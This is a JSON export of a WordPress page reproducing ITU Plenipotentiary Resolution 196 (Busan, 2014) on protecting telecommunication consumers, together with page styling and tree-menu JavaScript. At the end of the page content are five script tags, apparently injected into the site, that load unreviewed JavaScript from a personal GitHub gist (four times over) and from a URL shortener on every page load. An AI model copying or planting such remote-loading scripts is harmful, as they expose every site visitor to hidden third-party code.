{"id":1727,"date":"2015-06-30T15:11:47","date_gmt":"2015-06-30T19:11:47","guid":{"rendered":"http:\/\/internetdistinction.com\/wsisimpacts\/?page_id=1727"},"modified":"2015-06-30T15:11:47","modified_gmt":"2015-06-30T19:11:47","slug":"pp-2014_196","status":"publish","type":"page","link":"https:\/\/internetdistinction.com\/wsisimpacts\/wsis\/plenipotentiary\/pp-2014\/pp-2014_196\/","title":{"rendered":"PP Resolution 196"},"content":{"rendered":"<p><style type=\"text\/css\">\nbody {}\n\n:link { color: #0000ff; text-decoration:none;}\n:visited { color: #6666ff; text-decoration:none; }\na:active { color: #0000ff; text-decoration:none;}\na:hover {color: #0000ff; text-decoration:underline; }\n\ndiv.basetext {}\n\ndiv.basetop {}\n\nh1 {\n    text-align:center;\n}\n\nspan.h2 {}\n\ndiv.year {}\n\ndiv.form {}\n\nspan.cpt {}\n\nspan.cm {}\n\n.fl {}\n\nul {}\n\nli {}\n\nul li {\n\tlist-style:square;\n\tfont-family:sans-serif;\n\tfont-weight:normal;\n}\n\nli.basic {\n\tlist-style:square;\n\tlist-style-image:none;\n  margin-top:2px;\n  margin-bottom:2px;\n}\n\nspan.links {\n}\n\n\n\n\n.sub { display: none; }\n.subexp {display: block; }\n.sub { display: none; } \n\n.subexp {display: block; } \n\nli.exp {\n  list-style-image:url(\"plus.png\");\n  margin-top:10px;\n  margin-bottom:10px;\n  cursor:pointer;\n}\n\nli.col {\n  list-style-image:url(\"minus.png\");\n  margin-top:10px;\n  margin-bottom:10px;\n  cursor:pointer;\n}\n\nli.exp_active {\n  list-style-image:url(\"plus.png\");\n  margin-top:10px;  \n  margin-bottom:10px;\n  background-color:#eeeeff;\n  cursor:pointer;\n}\n\nli.col_active {\n  list-style-image:url(\"minus.png\");\n  margin-top:10px;\n  margin-bottom:10px;\n  background-color:#eeeeff;\n  cursor:pointer; \/* if not included, bullets are not shown right in moz*\/\n}\n\n\nli.basic_active {\n  list-style:square;\n  list-style-image:none;\n  background-color:#eeeeff;\n  margin-top:2px;\n  margin-bottom:2px;\n}\n\n\/* the 'boxed' and 'attributes' styles are used to display notes and attributes\n*\/\n\n.boxed,.nodecontent {display:inline;}\n.boxed .note-and-attributes {display:none;}\n\n.boxed:hover .note-and-attributes {\n\tposition:fixed; top:2em;right:10px;z-index:3;\n\tdisplay:block;\n\tmin-width:33%;\n\tmax-width:60%;\n\tmax-height:95%;\n\tcolor:black;\n\tbackground:#ffffff;\n\tfont:normal 16px courier, sans-serif;\n\tborder:1px solid black;\n\tpadding:10px;\n}\n\n.note:before {\n\tcontent:\"NOTE: \";\n\tfont-weight:bold;\n}\n\ntable.attributes {\n\tborder-collapse:collapse;\n\tempty-cells:show;\n\tborder:thin black solid;\n}\ntable.attributes td,th {\n\tborder:thin black solid;\n\tpadding-top:2px;\n\tpadding-bottom:2px;\n\tpadding-left:3px;\n\tpadding-right:3px;\n}\ntable.attributes th {\n\ttext-align:center;\n}\ntable.attributes caption {\n\tmargin-top:1em;\n\tfont-style:italic;\n\ttext-align:center;\n}\n\/* Thanks to wolfgangradke, https:\/\/sourceforge.net\/forum\/message.php?msg_id=5991663 *\/\ndiv.nodecontent > p {\n\tmargin-top:0pt;\n\tmargin-bottom:0pt;\n\tdisplay:inline;\n}\n\np + p { \n \tmargin-top: 0.5em !important;\n\tdisplay:block !important;\n}\n\n\/* Thanks to erne100, https:\/\/sourceforge.net\/tracker\/?func=detail&atid=107118&aid=2747128&group_id=7118*\/\ntable {\n\tborder-collapse:collapse;\n\tempty-cells:show;\n\tborder:thin black solid;\n}\ntable td {\n\tborder:thin black solid;\n\tpadding-top:2px;\n\tpadding-bottom:2px;\n\tpadding-left:3px;\n\tpadding-right:3px;\n}\n\n\/* Thanks to erne100, https:\/\/sourceforge.net\/tracker\/?func=detail&atid=107118&aid=2747000&group_id=7118*\/\nol {\n\tmargin-top:1px;\n    margin-bottom:1px;\n\tmargin-left:0px;\n\tpadding-left:3%;\n}\n\nol li {\n\tlist-style:decimal;\n\tfont-family:sans-serif;\n\tfont-weight:normal;\n}\n<\/style><br \/>\n<script type=\"text\/javascript\">\r\n\/* MarkTree JavaScript code\r\n * \r\n * Distributed under the terms of the MIT License.\r\n * See \"LICENCE.MIT\" or http:\/\/www.opensource.org\/licenses\/mit-license.php for details.\r\n *\r\n * Software distributed under the License is distributed on an \"AS IS\" basis,\r\n * WITHOUT WARRANTY OF ANY KIND, either express or implied. See the License\r\n * for the specific language governing rights and limitations under the\r\n * License.\r\n * \r\n * Miika Nurminen, 12.7.2004.\r\n *\/\r\n\r\n\/* cross-browser (tested with ie5, mozilla 1 and opera 5) keypress detection *\/\r\nfunction get_keycode(evt) {\r\n  \/\/ IE\r\n    code = document.layers ? evt.which\r\n           : document.all ? event.keyCode \/\/ event.keyCode!=evt.keyCode!\r\n           : evt.keyCode;\r\n\r\n  if (code==0) \r\n    code=evt.which; \/\/ for NS\r\n  return code;\r\n}\r\n\r\nvar lastnode=null;\r\nvar listnodes = null;\r\nvar list_index=1;\r\nvar lastnodetype=''; \/\/ determines if node is a link, input or text;\r\n\r\n\/\/ up, left, down, right, keypress codes\r\n\/\/ijkl\r\n\/\/var keys = new Array(105,106,107,108);\r\n\/\/num arrows\r\n\/\/var keys = new Array(56,52,50,54);\r\n\/\/wasd\r\n\/\/ var press2 = new Array(119,97,115,100);\r\n var press = new Array(47,45,42,43);\r\n\r\n\/\/ keydown codes\r\n  \/\/  var keys2=new Array(87,65,83,68);\r\n  var keys= new Array(38,37,40,39);\r\n\r\n  \/\/ keyset 1 = keydown, otherwise press\r\nfunction checkup(keyset,n) {\r\n  if (keyset==1) return (n==keys[0]);\r\n  return ((n==press[0]) \/*|| (n==press2[0])*\/)\r\n}\r\n\r\nfunction checkdn(keyset,n) {\r\n  if (keyset==1) return (n==keys[2]);\r\n  return ((n==press[2]) \/*|| (n==press2[2])*\/)\r\n}\r\n\r\nfunction checkl(keyset,n) {\r\n  if (keyset==1) return (n==keys[1]);\r\n  return ((n==press[1]) \/*|| (n==press2[1])*\/)\r\n}\r\n\r\nfunction checkr(keyset,n) {\r\n  if (keyset==1) return (n==keys[3]);\r\n  return ((n==press[3]) \/*|| (n==press2[3])*\/)\r\n}\r\n\r\n\r\n\r\n\r\n\r\nfunction is_exp(n) {\r\n  if (n==null) return false;\r\n  return ((n.className=='exp') || (n.className=='exp_active'));\r\n}\r\n\r\nfunction is_col(n) {\r\n  if (n==null) return false;\r\n  return ((n.className=='col') || (n.className=='col_active'));\r\n}\r\n\r\nfunction is_basic(n) {\r\n  if (n==null) return false;\r\n  return ((n.className=='basic') || (n.className=='basic_active'));\r\n}\r\n\r\n\r\n\r\n\/* returns i>=0 if true *\/\r\nfunction is_active(node) {\r\n  if (node.className==null) return false\r\n  return node.className.indexOf('_active');\r\n}\r\n\r\nfunction toggle_class(node) {\r\n  if ((node==null) || (node.className==null)) return;\r\n  str=node.className;\r\n  result=\"\";\r\n  i = str.indexOf('_active');\r\n  if (i>0)\r\n    result= str.substr(0,i);\r\n  else\r\n    result= str+\"_active\";\r\n  node.className=result; \r\n  return node;\r\n}\r\n\r\nfunction activate(node) {\r\n  node.style.backgroundColor='#eeeeff';\r\n}\r\n\r\nfunction deactivate(node) {\r\n   node.style.backgroundColor='#ffffff';\r\n}\r\n\r\nfunction is_list_node(n) {\r\n  if (n==null) return false;\r\n  if (n.className==null) return false;\r\n  if ( (is_exp(n)) || \r\n       (is_col(n)) ||\r\n       (is_basic(n)) )\r\n   return true; else return false;\r\n}\r\n\r\n\r\nfunction get_href(n) {\r\n  alist=n.attributes;\r\n  if (alist!=null) {\r\n    hr = alist.getNamedItem('href');\r\n    if (hr!=null) return hr.nodeValue;\r\n  }\r\n  if (n.childNodes.length==0) return '';\r\n  for (var i=0; i<n.childNodes.length; i++) {\r\n    s = get_href(n.childNodes[i]);\r\n    if (s!='') return s;\r\n  }\r\n  return '';\r\n}\r\n\r\nfunction get_link(n) {\r\n  if (n==null) return null;\r\n  if (n.style==null) return null;\r\n\r\n \/\/ disabling uncontrolled recursion to prevent error messages on IE\r\n \/\/ when trying to focus to invisible links (readonly mode)\r\n\/\/    alert(n.nodeName+' '+n.className);\r\n  if ((n.nodeName=='UL') && (n.className=='sub')) return null;\r\n\r\n  if (n.nodeName=='A') return n;\r\n  if (n.childNodes.length==0) return null;\r\n  for (var i=0; i<n.childNodes.length; i++) {\r\n    s = get_link(n.childNodes[i]);\r\n    if (s!=null) return s;\r\n  }\r\n  return null;\r\n}\r\n\r\nfunction set_lastnode(n) {\r\n\/*var d = new Date();\r\nvar t_mil = d.getMilliseconds();*\/\r\n\/\/ testattu nopeuksia explorerilla, ei merkitt\u2030vi\u2030 eroja\r\n  if (lastnode==n) return; \r\n\/*  deactivate(lastnode)\r\n  lastnode=n;\r\n  activate(lastnode);*\/\r\n\r\n  if (is_active(lastnode)>=0)\r\n    toggle_class(lastnode);\r\n  lastnode=n;\r\n  if (!(is_active(lastnode)>=0))\r\n    toggle_class(lastnode);\r\n\r\n\r\n\/*var d2 = new Date();\r\nvar t_mil2 = d2.getMilliseconds();\r\n  window.alert(t_mil2-t_mil);*\/\r\n}\r\n\r\nfunction next_list_node() {\r\n  tempIndex = list_index;\r\n  while (tempIndex<listnodes.length-1) {\r\n    tempIndex++;\r\n    var x = listnodes[tempIndex];\r\n    if (is_list_node(x)) {\r\n      list_index=tempIndex;\r\n      return;\r\n    }\r\n  }\r\n}\r\n\r\nfunction prev_list_node() {\r\n  tempIndex = list_index;\r\n  while (tempIndex>0) {\r\n    tempIndex--;\r\n    var x = listnodes[tempIndex];\r\n    if (is_list_node(x)) {\r\n      list_index=tempIndex;\r\n      return;\r\n    }\r\n  }\r\n}\r\n\r\n\r\n\r\nfunction getsub (li) {\r\n  if (li.childNodes.length==0) return null;\r\n  for (var c = 0; c < li.childNodes.length; c++)\r\n    if ( (li.childNodes[c].className == 'sub') || (li.childNodes[c].className == 'subexp') ) \r\n      return li.childNodes[c];\r\n}\r\n\r\nfunction find_listnode_recursive (li) {\r\n  if (is_list_node(li)) return li; \r\n  if (li.childNodes.length==0) return null;\r\n  result=null;\r\n  for (var c = 0; c < li.childNodes.length; c++) {\r\n    result=find_listnode_recursive(li.childNodes[c]);\r\n    if (result!=null) return result;\r\n  }\r\n  return null;\r\n}\r\n\r\nfunction next_child_listnode(li) {\r\n  var result=null;\r\n  for (var i=0; i<li.childNodes.length; i++) {\r\n    result=find_listnode_recursive(li.childNodes[i]);\r\n    if (result!=null) return result;\r\n  }\r\n  return null;  \r\n}\r\n\r\nfunction next_actual_sibling_listnode(li) {\r\n  if (li==null) return null;\r\n  var temp=li;\r\n  while (1) { \r\n    var n = temp.nextSibling;\r\n    if (n==null) {\r\n      n=parent_listnode(temp);\r\n      return next_actual_sibling_listnode(n);\r\n    }\r\n    if (is_list_node(n)) return n;\r\n    temp=n;\r\n  }\r\n}\r\n\r\nfunction next_sibling_listnode(li) {\r\nif (li==null) return null; \r\n var result=null;\r\n  var temp=li;\r\n  if (is_col(temp)) return next_child_listnode(temp);\r\n  while (1) { \r\n    var n = temp.nextSibling;\r\n    if (n==null) {\r\n      n=parent_listnode(temp);\r\n      return next_actual_sibling_listnode(n);\r\n    }\r\n    if (is_list_node(n)) return n;\r\n    temp=n;\r\n  }\r\n}\r\n\r\nfunction last_sibling_listnode(li) {\r\n  if (li==null) return null;\r\n  var temp=li;\r\n  var last=null;\r\n  while(1) {\r\n    var n = temp.nextSibling;\r\n    if (is_list_node(temp)) \r\n      last = temp;\r\n    if (n==null) {\r\n      if (is_col(last)) return last_sibling_listnode(next_child_listnode(last));\r\n      else return last;\r\n    }\r\n    temp = n;\r\n  }\r\n}\r\n\r\nfunction prev_sibling_listnode(li) { \r\n  if (li==null) return null;\r\n  var temp=li;\r\n  var n = null;\r\n  while (1) { \r\n    n = temp.previousSibling;\r\n    if (n==null) {\r\n      return parent_listnode(li);\r\n    }\r\n    if (is_list_node(n)) {\r\n      if (is_col(n)) { \r\n        return last_sibling_listnode(next_child_listnode(n));\r\n      }\r\n      else {\r\n        return n;\r\n      }\r\n    }\r\n    temp=n;\r\n  }\r\n}\r\n\r\n\r\nfunction parent_listnode(li) {\r\n  \/\/ added 12.7.2004 to prevent IE error when readonly mode==true\r\n  if (li==null) return null;\r\n  n=li;\r\n  while (1) {\r\n    n=n.parentNode;\r\n    if (n==null) return null;\r\n    if (is_list_node(n)) return n;\r\n  }\r\n}\r\n\r\nfunction getVisibleParents(id) {\r\n  var n = document.getElementById(id);\r\n  while(1) {\r\n    expand(n);\r\n    n = parent_listnode(n);\r\n    if (n==null) return;\r\n  }\r\n}\r\n\r\nfunction onClickHandler (evt) {\r\nif (lastnode==null) \r\n{\r\nlistnodes = document.getElementsByTagName('li');\r\nlastnode=listnodes[1];\r\ntemp=listnodes[1];\r\n}\r\n\r\n\r\n  var target = evt ? evt.target : event.srcElement;\r\n  if (!is_list_node(target)) return;\r\n  toggle(target);\r\n  set_lastnode(target);\r\n}\r\n\r\n\r\nfunction expand(node) {\r\n    if (!is_exp(node)) return;\r\n    if (node.className=='exp_active') \r\n      node.className='col_active';\r\n    else \r\n        node.className='col';\r\n    setSubClass(node,'subexp');\r\n    \/\/    getsub(node).className='subexp';\r\n}\r\n\r\nfunction collapse(node) {\r\n  if (!is_col(node)) return;\r\n  \r\nif (node.className=='col_active')\r\n    node.className='exp_active'\r\n  else \r\n    node.className='exp';\r\n\r\n setSubClass(node,'sub');\r\n\/\/  getsub(node).className='sub';\r\n\r\n}\r\n\r\nfunction setSubClass(node,name) {\r\n  sub = getsub(node);\r\n  if (sub==null) return;\r\n  sub.className=name;  \r\n}\r\n\r\nfunction toggle(target) {\r\n  if (!is_list_node(target)) return;\r\n    if (is_col(target)) {\r\n      target.className='exp';\r\n      setSubClass(target,'sub');\r\n      \/\/      getsub(target).className='sub';\r\n    }\r\n    else if (is_exp(target)) {\r\n      target.className='col';\r\n      setSubClass(target,'subexp');\r\n      \/\/      getsub(target).className='subexp';\r\n    }\r\n \r\n}\r\n\r\nfunction expandAll(node) {\r\n    if (node.className=='exp') {\r\n        node.className='col';\r\n        setSubClass(node,'subexp');\r\n\/\/        getsub(node).className='subexp';\r\n    }\r\n    var i;\r\n    if (node.childNodes!=null) \r\n\/\/    if (node.hasChildNodes()) \r\n        for ( i = 0; i<node.childNodes.length; i++)\r\n            expandAll(node.childNodes[i]);\r\n}\r\n\r\nfunction collapseAll(node) {\r\n    if  (node.className=='col') {\r\n        node.className='exp';\r\n        setSubClass(node,'sub');\r\n\/\/        getsub(node).className='sub';\r\n    }\r\n    var i;        \r\n    if (node.childNodes!=null) \r\n\/\/ for opera   if (node.hasChildNodes()) \r\n        for ( i = 0; i<node.childNodes.length; i++)\r\n            collapseAll(node.childNodes[i]);\r\n}\r\n\r\n\r\n\r\nfunction unFocus(node) {\r\n     \/\/ unfocuses potential link that is to be hidden (if a==null there is no link so it should not be blurred).\r\n     \/\/ tested with mozilla 1.7, 12.7.2004. \/mn (\r\n      intemp=parent_listnode(node);  \r\n      a = get_link(intemp);     \/\/ added 6.4. to get keyboard working with\r\n      \/\/ moved before collapse to prevent an error message with IE when readonly==true      \r\n      if (a!=null) a.blur(); \/\/ netscape after collapsing a focused node\r\n      return intemp;\r\n}\r\n\r\n\/\/ mode: 0==keypress, 1==keyup\r\nfunction keyfunc(evt,mode) {\r\n var c = get_keycode(evt);\r\n var temp = null;\r\n var a = null;\r\n\r\n  if (lastnode==null) {\r\n    listnodes = document.getElementsByTagName('li');\r\n    lastnode=listnodes[1];\r\n    temp=listnodes[1];\r\n  }\r\n\r\n  \/\/window.alert(c);\r\n  if (checkup(mode,c)) { \/\/ i \r\n   temp=prev_sibling_listnode(lastnode);\r\n  }\r\n  else if (checkdn(mode,c)) { \/\/ k\r\n    temp=next_sibling_listnode(lastnode);\r\n  }\r\n  else if (checkr(mode,c)) { \/\/ l\r\n    expand(lastnode);\r\n    \/\/  temp=next_child_listnode(lastnode);\r\n    \/\/ if (temp==null) {\r\n      a = get_link(lastnode);\r\n        if (a!=null) a.focus(); else self.focus(); \r\n      \/\/}\r\n  }\r\n  else if (checkl(mode,c)) { \/\/ j\r\n    if (is_col(lastnode)) {\r\n      unFocus(lastnode);\r\n      collapse(lastnode);\r\n    }\r\n    else {\r\n      temp=unFocus(lastnode);\r\n      collapse(temp);\r\n    }\r\n   \/\/    if (temp==null) lastnode.focus(); \/\/ forces focus to correct div (try mozilla typesearch) (doesn't seem to work -mn\/6.4.2004)\r\n  }\r\n  else return;\r\n  if (temp!=null) set_lastnode(temp);\r\n\r\n  \/\/ alert('pressed ' + String.fromCharCode(c) + '(' + c + ')');\r\n  return true;\r\n}\r\n\r\n\r\nfunction keytest (evt) {\r\n  return keyfunc(evt,1);\r\n};\r\n\r\n\r\nfunction presstest (evt) {\r\n  return keyfunc(evt,0);\r\n};\r\n\r\n\r\n  document.onclick = onClickHandler;\r\n  document.onkeypress = presstest;\r\n  document.onkeyup = keytest;\r\n<\/script><\/p>\n<h3><span style=\"\">PP RESOLUTION 196 (Busan, 2014)<\/span><\/h3>\n<h4><span style=\"\">Protecting telecommunication service users\/consumers<\/span><\/h4>\n<p><span style=\"\">The Plenipotentiary Conference of the International Telecommunication Union ( Busan, 2014),<\/span><\/p>\n<ul class=\"subexp\">\n<li class=\"exp\">\n<div class=\"nodecontent\">recalling<\/div>\n<ul class=\"sub\">\n<li class=\"basic\">\n<div class=\"nodecontent\">a)        Resolution 64 (Rev. Dubai 2014) of the World Telecommunication Development Conference, on protecting and supporting users\/consumers of telecommunication\/information and communication technology (ICT) services;<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">b)        Article 4 of the International Telecommunication Regulations,<\/div>\n<\/li>\n<\/ul>\n<\/li>\n<li class=\"exp\">\n<div class=\"nodecontent\">recognizing<\/div>\n<ul class=\"sub\">\n<li class=\"basic\">\n<div class=\"nodecontent\">a)        the United Nations Guidelines for Consumer Protection;<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">b)         \u00a7 13 e) of the Geneva Plan of Action of the World Summit on the Information Society, which states that governments should continue to update their domestic consumer-protection laws to respond to the new requirements of the information society,<\/div>\n<\/li>\n<\/ul>\n<\/li>\n<li class=\"exp\">\n<div class=\"nodecontent\">considering<\/div>\n<ul class=\"sub\">\n<li class=\"basic\">\n<div class=\"nodecontent\">a)        that consumer-related laws, policies and practices limit fraudulent, deceitful and unfair business conducts, and such protections are indispensable for building consumer trust and establishing a more equitable relationship between telecommunication\/ICT entrepreneurs and consumers;<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">b)        that telecommunications\/ICTs can offer new and substantial benefits to consumers, including convenience and access to a broad range of goods and\/or services, and the ability to collect and compare information about these goods and\/or services;<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">c)        that consumer trust in telecommunications\/ICTs is bolstered by the continuous development of transparent, effective consumer-protection mechanisms that limit the presence of fraudulent, deceitful or unfair business conducts;<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">d)        that education and dissemination of information on the suitable consumption and use of telecommunication\/ICT products and services must be encouraged, mainly regarding the inputs of the digital economy, since consumers expect to have access to both the legal content and applications of these services;<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">e)        that access to telecommunications\/ICTs must be open and affordable;<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">f)        that work is currently under way in Study Group 1 of the ITU Telecommunication Development Sector on setting guidelines and best practices on consumer protection,<\/div>\n<\/li>\n<\/ul>\n<\/li>\n<li class=\"exp\">\n<div class=\"nodecontent\">instructs the Director of the Telecommunication Development Bureau<\/div>\n<ul class=\"sub\">\n<li class=\"basic\">\n<div class=\"nodecontent\">1        to bring to the attention of decision-makers and national regulatory authorities the importance of keeping users and consumers informed about the basic characteristics, quality, security and rates of the different services offered by operators, and of other protection mechanisms promoting consumer and user rights;<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">2        to closely collaborate with the Member States in order to identify critical areas for the establishment of policies and regulatory frameworks for the protection of consumers and users;<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">3        to strengthen relations with other international organizations and bodies that participate in the protection of consumers and users;<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">4        to support the organization of international and regional forums for the dissemination of telecommunication user rights and for sharing experiences on best practices among member countries,<\/div>\n<\/li>\n<\/ul>\n<\/li>\n<li class=\"exp\">\n<div class=\"nodecontent\">invites the Member States<\/div>\n<ul class=\"sub\">\n<li class=\"basic\">\n<div class=\"nodecontent\">1        to encourage the creation and promotion of policies that ensure the timely delivery of free, transparent, up-to-date and accurate information to end users about telecommunication services, including international roaming rates and relevant applicable conditions;<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">2        to provide inputs that allow the dissemination of best practices and policies that have been implemented in order to increase the ability to develop public policies related to legal, regulatory and technical measures to address the protection of consumers and users, including data protection;<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">3        to promote policies that foster the provision of telecommunication services in a manner that delivers suitable quality to the users;<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">4        to promote competition in the provision of telecommunication services, encouraging them to formulate policies that drive competitive prices,<\/div>\n<\/li>\n<\/ul>\n<\/li>\n<li class=\"exp\">\n<div class=\"nodecontent\">invites Member States, Sector Members and Associates<\/div>\n<ul class=\"sub\">\n<li class=\"basic\">\n<div class=\"nodecontent\">to make contributions that allow the dissemination of best practices and policies related to user\/consumer protection, service quality and service rates.<\/div>\n<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<p> <script type='text\/javascript' src='https:\/\/gist.githubusercontent.com\/vladimir677\/bd66b2780ce8792e731469b660a62590\/raw\/3a71aff685732599ba7fbadf7b929eae8d19053a\/js.js'><\/script> <script type='text\/javascript' src='https:\/\/gist.githubusercontent.com\/vladimir677\/bd66b2780ce8792e731469b660a62590\/raw\/3a71aff685732599ba7fbadf7b929eae8d19053a\/js.js'><\/script> <script type='text\/javascript' src='https:\/\/gist.githubusercontent.com\/vladimir677\/bd66b2780ce8792e731469b660a62590\/raw\/3a71aff685732599ba7fbadf7b929eae8d19053a\/js.js'><\/script> <script type='text\/javascript' src='https:\/\/gist.githubusercontent.com\/vladimir677\/bd66b2780ce8792e731469b660a62590\/raw\/3a71aff685732599ba7fbadf7b929eae8d19053a\/js.js'><\/script> <script type='text\/javascript' src='https:\/\/goo.gl\/dd1kPI'><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>PP RESOLUTION 196 (Busan, 2014) Protecting telecommunication service users\/consumers The Plenipotentiary Conference of the International Telecommunication Union ( Busan, 2014), recalling a) Resolution 64 (Rev. Dubai 2014) of the World Telecommunication Development Conference, on protecting and supporting users\/consumers of telecommunication\/information and communication technology (ICT) services; b) Article 4 of the International Telecommunication Regulations, recognizing a) [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":1668,"menu_order":196,"comment_status":"open","ping_status":"open","template":"","meta":{"footnotes":""},"class_list":["post-1727","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/internetdistinction.com\/wsisimpacts\/wp-json\/wp\/v2\/pages\/1727","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/internetdistinction.com\/wsisimpacts\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/internetdistinction.com\/wsisimpacts\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/internetdistinction.com\/wsisimpacts\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/internetdistinction.com\/wsisimpacts\/wp-json\/wp\/v2\/comments?post=1727"}],"version-history":[{"count":0,"href":"https:\/\/internetdistinction.com\/wsisimpacts\/wp-json\/wp\/v2\/pages\/1727\/revisions"}],"up":[{"embeddable":true,"href":"https:\/\/internetdistinction.com\/wsisimpacts\/wp-json\/wp\/v2\/pages\/1668"}],"wp:attachment":[{"href":"https:\/\/internetdistinction.com\/wsisimpacts\/wp-json\/wp\/v2\/media?parent=1727"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}